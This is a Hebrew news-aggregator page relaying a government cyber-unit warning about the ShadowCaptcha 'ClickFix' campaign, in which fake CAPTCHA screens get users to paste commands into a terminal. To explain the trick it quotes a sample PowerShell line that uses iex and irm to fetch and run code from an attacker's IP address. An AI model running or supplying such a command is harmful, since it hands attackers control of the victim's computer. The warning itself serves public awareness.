מערך הדיגיטל מזהיר: מסך "אני לא רובוט" מזויף משמש להשתלטות על מחשבים

בחר פורום
———
סקופים
הזעקה
פוליטיקה
ביקורת תקשורת
מסמכים
הקפה
משפטים
בית המדרש
עיתונות זרה
מודיעין

לאחר ניסיונות תקיפה ב־45 מדינות ומאות אתרים שנפרצו ברחבי העולם, היחידה להגנת הסייבר בממשלה (יה"ב) במערך הדיגיטל הלאומי מזהירה מפני קמפיין התקיפה הבינלאומי ShadowCaptcha, המבוסס על הנדסה חברתית.
🔎 כך זה עובד:תוקפים מציגים מסך אימות מזויף ("אני לא רובוט"), לעיתים גם באתרים לגיטימיים שנפרצו, ומנחים את המשתמש לבצע פעולות במחשב – כמו פתיחת חלון פקודות והדבקת טקסט.ביצוע הפעולות עלול להוביל להורדת תוכנה זדונית, שתאפשר לתוקפים להשתלט על המחשב, לגנוב מידע, לכרות מטבעות דיגיטליים ואף לדרוש כופר.
חשוב לזכור:✅ מבחן CAPTCHA אמיתי מתבצע רק בדפדפן (למשל סימון תיבה או בחירת תמונות).❌ הוא לעולם לא יבקש מכם לפתוח חלון פקודות, ללחוץ על צירופי מקשים או להדביק טקסט במחשב.


מקור:https://www.facebook.com/israelgov/photos/%EF%B8%8F-%D7%9E%D7%A2%D7%A8%D7%9A-%D7%94%D7%93%D7%99%D7%92%D7%99%D7%98%D7%9C-%D7%94%D7%9C%D7%90%D7%95%D7%9E%D7%99-%D7%9E%D7%96%D7%94%D7%99%D7%A8-%D7%9E%D7%A4%D7%A0%D7%99-%D7%A7%D7%9E%D7%A4%D7%99%D7%99%D7%9F-%D7%94%D7%AA%D7%A7%D7%99%D7%A4%D7%94-shadowcaptcha%D7%9E%D7%A1%D7%9A-%D7%90%D7%A0%D7%99-%D7%9C%D7%90-%D7%A8%D7%95%D7%91%D7%95%D7%98-%D7%9E%D7%95%D7%9B/1464136559088758/
https://www.mako.co.il/nexter-news/Article-487c8b1b648df91027.htm

רק אחרי שהוא "בודק", הוא מודיע לך שנדרשת פעולה נוספת. כמו שציינו הפעולה כוללת הדבקה של סקריפט, שלא נראה מאוד חשוד במבט ראשון לטרמינל.
מי שלא מודע יכול ליפול בפח, בעיקר שהם בונים על זה שהמשתמש הרי רוצה כבר לעבור את הבדיקה הרוטינית כדי להגיע לאתר שהוא מנסה להגיע אליו. בנוסף אולי הם בונים על זה שמשתמשים ירגישו שחובת ההוכחה עליהם שהם בני אדם וחסרה רק פעולה קטנה.
global:cfChallenge="challenge.cloudflare.com";$global:challengeHash="<some hash>";$global:confirmChallenge=$true;iex(irm <IP address> -UseBasicParsing)
למעשה הסקריפט מריץ על המחשב המקורי קוד נוסף שנתקבל מהשרת בכתובת ה ip. הם משתמשים בתשתית אכסון של חברות שפחות מקפידות על מי מריץ מה על התשתיות שלהן.
מתקפה מסוג זה נקראת ClickFix.

מערך הדיגיטל הלאומי מזהיר מפני קמפיין תקיפה בינלאומי בשם ShadowCaptcha, אשר התפשט ב-45 מדינות ופגע במאות אתרים. התוקפים משתמשים במסך אימות מזויף של "אני לא רובוט", לעיתים גם באתרים לגיטימיים שנפרצו, ומנחים את המשתמשים לבצע פעולות במחשב, כמו פתיחת חלון פקודות והדבקת טקסט.
מבחן CAPTCHA אמיתי מתבצע רק בדפדפן (למשל סימון תיבה או בחירת תמונות). הוא לעולם לא יבקש מכם לפתוח חלון פקודות, ללחוץ על צירופי מקשים או להדביק טקסט במחשב.
ביצוע פעולות אלו עלול להוביל להורדת תוכנה זדונית המאפשרת השתלטות על המחשב, גניבת מידע, כריית מטבעות דיגיטליים ודרישת כופר.
© כל הזכויות על הכתבה המקורית שמורות למקור. דין אונליין מציג כותרת, תקציר וקישור בלבד. דירוג האובייקטיביות מחושב אוטומטית ומהווה הערכה בלבד.
דיון
אין עדיין תגובות — היו הראשונים להגיב.